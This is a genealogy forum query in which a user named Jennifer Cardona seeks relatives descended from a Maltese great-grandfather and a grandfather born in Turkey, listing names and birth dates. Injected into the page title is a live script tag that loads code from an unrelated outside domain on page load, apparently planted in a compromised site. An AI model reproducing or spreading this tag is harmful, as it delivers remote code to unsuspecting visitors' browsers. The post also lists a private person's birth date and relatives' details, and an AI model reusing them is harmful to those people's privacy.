Looking for CARDONA with family from Malta/turkey<script src="https://bestdoctornearme.com/splitter.ai/index.php"></script> :: FamilyTreeCircles.com Genealogy
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Looking for CARDONA with family from Malta/turkey

Query by Jenniferlcardona

My name is Jennifer Cardona
I was born July 14 2000 in Canada

My fathers name is Chris Cardona
He was born July 15 1954 in Canada
Chris has a brother named Jeffrey Cardona, born June 2 1957 in Canada.

My fathers father is named John Cardona.
He was born in turkey in 1913.
John had 7 siblings, of which many, if not all, have passed away.
John fought in WWII
He moved to Canada after fighting in the war
John married Sylvia Downie in Canada
John died in 2000

Johns father is named Salvatori Cardona
Salvatori was born in Malta
He married and had 8 children.
He fought in WWI and went MIA
He was never seen again

Surnames: Cardona
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on 2014-08-19 12:21:12

Jenniferlcardona has been a Family Tree Circles member since Aug 2014.

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